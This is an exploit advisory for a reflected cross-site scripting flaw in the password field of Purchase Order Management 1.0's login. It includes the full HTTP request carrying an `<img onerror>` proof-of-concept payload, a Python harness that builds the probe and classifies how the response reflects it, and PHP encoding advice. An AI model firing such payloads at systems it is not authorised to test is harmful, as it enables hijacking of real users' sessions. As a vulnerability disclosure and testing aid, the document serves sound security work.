## https://sploitus.com/exploit?id=PACKETSTORM:171238
## Title: Purchase Order Management-1.0 - XSS-Reflected - Information-gathering  
## Author: nu11secur1ty  
## Date: 03.06.2023  
## Vendor: https://www.sourcecodester.com/user/257130/activity  
## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html  
## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected  
  
## Description:  
The value of the `password` request parameter is copied into the HTML
document as plain text between tags. The payload `uay4w<img src=a
onerror=alert(1)>s4m6g` was submitted in the `password` parameter and was
echoed unmodified in the application's response, so the injected `<img>`
element is parsed as markup and its `onerror` handler runs in the
application's origin. The random strings `uay4w` and `s4m6g` are canaries
that mark where the reflection lands in the response; they carry no payload
themselves.
  
STATUS: HIGH Vulnerability  
  
[+]Exploit:  
```http
POST /purchase_order/classes/Login.php?f=login HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=83loqso6i0hee5lpfufibf68o5
Origin: http://localhost
X-Requested-With: XMLHttpRequest
Referer: http://localhost/purchase_order/admin/login.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="110", "Chromium";v="110"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 87

username=gAjjuMUL&password=k8Z!h2w!V7uay4w%3cimg%20src%3da%20onerror%3dalert(1)%3es4m6g
```

Note: the `Content-Length` must match the encoded body (87 bytes for the body above); the original request header still carried the length of the plain `k8Z!h2w!V7` password (37), which would truncate the payload before the server sees it.
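As an added example, not part of the advisory and not the project's own code, here is a small Python harness for the reflection check described above. It assumes the login path and parameter names shown in the request; the host, username and sample responses are constructed placeholders, not captures from the application. It generates canary markers like the `uay4w`/`s4m6g` pair, serializes the login POST with a `Content-Length` that matches its body, and classifies a response as reflecting the probe raw, HTML-encoded, modified, or not at all.

```python
import html
import re
import secrets
import string
from urllib.parse import urlencode

# Constructed values mirroring the advisory's request; the host and the
# credential strings are placeholders, not a real target.
LOGIN_PATH = "/purchase_order/classes/Login.php?f=login"
INJECTION = "<img src=a onerror=alert(1)>"
ALPHABET = string.ascii_lowercase + string.digits


def make_canary(length=5):
    """Random marker such as the advisory's 'uay4w' / 's4m6g', used to locate the
    reflection in the response without matching unrelated page text."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def build_probe(prefix, suffix, injection=INJECTION):
    """Wrap the injection between two canaries: prefix + injection + suffix."""
    return f"{prefix}{injection}{suffix}"


def build_login_request(host, username, password, path=LOGIN_PATH):
    """Serialize the POST as raw HTTP/1.1 text. Content-Length is computed from
    the encoded body, so the payload is never truncated by a stale header."""
    body = urlencode({"username": username, "password": password})
    headers = [
        f"POST {path} HTTP/1.1",
        f"Host: {host}",
        "Content-Type: application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With: XMLHttpRequest",
        f"Content-Length: {len(body.encode('utf-8'))}",
        "Connection: close",
    ]
    return "\r\n".join(headers) + "\r\n\r\n" + body


def classify_reflection(response_body, prefix, suffix, injection=INJECTION):
    """Classify how the probe came back:
       'raw'      - injection reflected byte-for-byte (exploitable, as on this page)
       'encoded'  - reflected but HTML-entity-encoded (htmlspecialchars-style fix)
       'modified' - reflected but altered (a filter or partial encoding; inspect it)
       'absent'   - canaries not found in the response
    """
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), response_body, re.S)
    if m is None:
        return "absent"
    between = m.group(1)
    if between == injection:
        return "raw"
    if between in (html.escape(injection, quote=True), html.escape(injection, quote=False)):
        return "encoded"
    return "modified"


# Constructed sample responses (not captured from the application): the first is
# the behaviour the advisory describes, the second is the same page after output
# encoding has been applied to the echoed value.
VULNERABLE_RESPONSE = (
    '<div class="alert alert-danger">Incorrect username or password: '
    "uay4w<img src=a onerror=alert(1)>s4m6g</div>"
)
FIXED_RESPONSE = (
    '<div class="alert alert-danger">Incorrect username or password: '
    "uay4w&lt;img src=a onerror=alert(1)&gt;s4m6g</div>"
)


if __name__ == "__main__":
    pre, suf = make_canary(), make_canary()
    print(build_login_request("localhost", "gAjjuMUL", build_probe(pre, suf)))
    print(classify_reflection(VULNERABLE_RESPONSE, "uay4w", "s4m6g"))  # raw
    print(classify_reflection(FIXED_RESPONSE, "uay4w", "s4m6g"))       # encoded
```

An `encoded` result is what the remediation looks like from the outside: in PHP, passing the echoed value through `htmlspecialchars($value, ENT_QUOTES, 'UTF-8')` before output turns the `<img>` tag into inert text. The harness deliberately stops short of sending traffic; pair `build_login_request` with a socket or `http.client` only against a lab instance you own.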
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Purchase-Order-Management-1.0/XSS-Reflected)  
  
## Proof and Exploit:  
[href](https://streamable.com/cgw8a4)  
  
## Time spent:
00:15:00  
  
  
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/ https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
  